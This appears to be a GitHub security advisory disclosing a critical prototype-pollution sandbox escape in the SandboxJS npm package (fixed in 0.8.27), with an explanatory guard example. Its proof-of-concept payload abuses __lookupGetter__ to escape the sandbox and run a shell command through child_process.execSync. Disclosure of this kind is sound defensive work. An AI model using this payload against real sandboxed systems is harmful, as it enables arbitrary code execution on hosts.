GHSA-9p4w-fq8m-2hp7

Published: 02 Feb 2026
Source: github
Github: Reviewed
CVSS3: 10

Description

SandboxJS Vulnerable to Prototype Pollution -> Sandbox Escape -> RCE

Summary

SandboxJS does not properly restrict __lookupGetter__ which can be used to obtain prototypes, which can be used for escaping the sandbox / remote code execution.

Details

https://github.com/nyariv/SandboxJS/blob/f212a38fb5a6d4bc2bc2e2466c0c011ce8d41072/src/executor.ts#L368-L398

The Object prototype which contains __lookupGetter__ is properly protected, but the special case for accessing function properties bypasses the prototype chain checks including the root Object prototype.
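
The gap described above, reduced to a minimal property guard. This is an added example, not SandboxJS code: `PROTECTED`, `ownerOf`, `flawedGet` and `guardedGet` are hypothetical names, and the denylist is constructed for illustration.

```javascript
"use strict";
// Added illustration, not SandboxJS source: every name below is hypothetical.

// Prototypes whose members the guard refuses to hand out (constructed denylist).
const PROTECTED = new Set([Object.prototype, Function.prototype]);

// Walk the prototype chain and return the object that owns `prop`, or null.
function ownerOf(obj, prop) {
  for (let o = Object(obj); o !== null; o = Object.getPrototypeOf(o)) {
    if (Object.prototype.hasOwnProperty.call(o, prop)) return o;
  }
  return null;
}

// Flawed shape: function receivers take a shortcut that returns the
// property before the prototype-chain check ever runs.
function flawedGet(obj, prop) {
  if (typeof obj === "function") return obj[prop]; // special case skips the check
  if (PROTECTED.has(ownerOf(obj, prop))) throw new TypeError(`blocked: ${String(prop)}`);
  return obj[prop];
}

// Hardened shape: the same ownership check applies to every receiver.
function guardedGet(obj, prop) {
  if (PROTECTED.has(ownerOf(obj, prop))) throw new TypeError(`blocked: ${String(prop)}`);
  return obj[prop];
}

// True when `getter` refuses to return `prop` from `obj`.
function isBlocked(getter, obj, prop) {
  try { getter(obj, prop); return false; } catch (e) { return e instanceof TypeError; }
}

function demo() {
  const fn = function sample() {};
  return {
    plainObjectFlawed: isBlocked(flawedGet, {}, "__lookupGetter__"),
    functionFlawed: isBlocked(flawedGet, fn, "__lookupGetter__"), // bypass
    functionGuarded: isBlocked(guardedGet, fn, "__lookupGetter__"),
    ownPropStillWorks: !isBlocked(guardedGet, { a: 1 }, "a"),
  };
}
console.log(demo());
```

A regression test for the fixed release can assert the same invariant: a member inherited from a protected prototype is refused regardless of whether the receiver is a plain object or a function.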

PoC

```js
const s = require("@nyariv/sandboxjs").default;
const sb = new s();
payload = `
let getProto = Object.toString.__lookupGetter__("__proto__")
let m = getProto.call(new Map());
m.has = isFinite;
console.log(
  isFinite.constructor(
    "return process.getBuiltinModule('child_process').execSync('ls -lah').toString()",
  )(),
);`
sb.compile(payload)().run();
```

Impact

Prototype Pollution -> RCE

Packages

Name: @nyariv/sandboxjs (npm)
Affected versions: <= 0.8.26
Fixed version: 0.8.27

EPSS

Percentile: 25%
0.00085
Low

CVSS3: 10 Critical

Weaknesses

CWE-94

Related vulnerabilities

CVSS3: 10
nvd
6 days ago

SandboxJS is a JavaScript sandboxing library. Prior to 0.8.27, SandboxJS does not properly restrict __lookupGetter__ which can be used to obtain prototypes, which can be used for escaping the sandbox / remote code execution. This vulnerability is fixed in 0.8.27.
